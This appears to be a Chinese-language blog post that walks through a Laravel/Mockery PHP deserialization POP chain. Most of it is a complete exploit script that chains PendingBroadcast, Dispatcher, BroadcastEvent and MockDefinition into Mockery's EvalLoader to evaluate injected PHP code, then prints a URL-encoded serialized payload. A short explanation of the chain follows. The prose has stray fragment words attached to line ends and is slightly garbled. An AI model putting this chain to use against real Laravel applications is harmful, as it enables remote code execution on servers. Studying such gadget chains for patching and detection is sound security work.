POP链挖掘
Laravel mockery组件
exp:php
<?php
namespace Illuminate\Broadcasting{
class PendingBroadcast
{
protected $event;
protected $events;
public function __construct($events,$event)
{
$this->events = $events;
$this->event = $event;
}
}
}
namespace Illuminate\Bus{
class Dispatcher
{
protected $queueResolver;
public function __construct($queueResolver)
{
$this->queueResolver = $queueResolver;
}
}
}
namespace Illuminate\Broadcasting{
class BroadcastEvent
{
public $connection;
public function __construct($connection)
{
$this->connection = $connection;
}
}
}
namespace Mockery\Generator{
class MockDefinition
{
protected $config;
protected $code = '<?php phpinfo();?>';
public function __construct($config)
{
$this->config = $config;
}
}
}
namespace Mockery\Generator{
class MockConfiguration
{
protected $name = '1234';
}
}
namespace Mockery\Loader{
class EvalLoader
{
public function load(MockDefinition $definition)
{
}
}
}
namespace{
$Mockery = new Mockery\Loader\EvalLoader();
$queueResolver = array($Mockery, "load");
$MockConfiguration = new Mockery\Generator\MockConfiguration();
$MockDefinition = new Mockery\Generator\MockDefinition($MockConfiguration);
$BroadcastEvent = new Illuminate\Broadcasting\BroadcastEvent($MockDefinition);
$Dispatcher = new Illuminate\Bus\Dispatcher($queueResolver);
$PendingBroadcast = new Illuminate\Broadcasting\PendingBroadcast($Dispatcher,$BroadcastEvent);
echo urlencode(serialize($PendingBroadcast));
}
?>
构造过程函数
入口类: PendingBroadcast
this
这里的
$this->events 是
Dispatcher 接口的,这里咱们找到一个实现了
Dispatcher 接口的类
跟进
url
看一下
commandShouldBeQueued 方法
要求 $command 实现了 ShouldQueue 接口,注意此时的 $command 其实就是 PendingBroadcast的 $event(是可控的)spa
找到其中一个类
BroadcastEvent,咱们能够将
PendingBroadcast 的
$event 覆盖为
BroadcastEvent
继续跟进 dispatchToQueue 方法,看到 call_user_func 方法code
注意此时的
$command 其实已经覆盖为
BroadcastEvent 类了,
connetcion 属性可控
此时咱们要考虑调用哪一个函数,这里使用了 EvalLoader 类接口
若是要调用这个函数,那么 if 条件必须是 false,查看 MockDefinition 类ci
覆盖 $this-config 为 MockConfiguration 这个类,给它的 name 属性随便赋值便可it
ok就到这里了io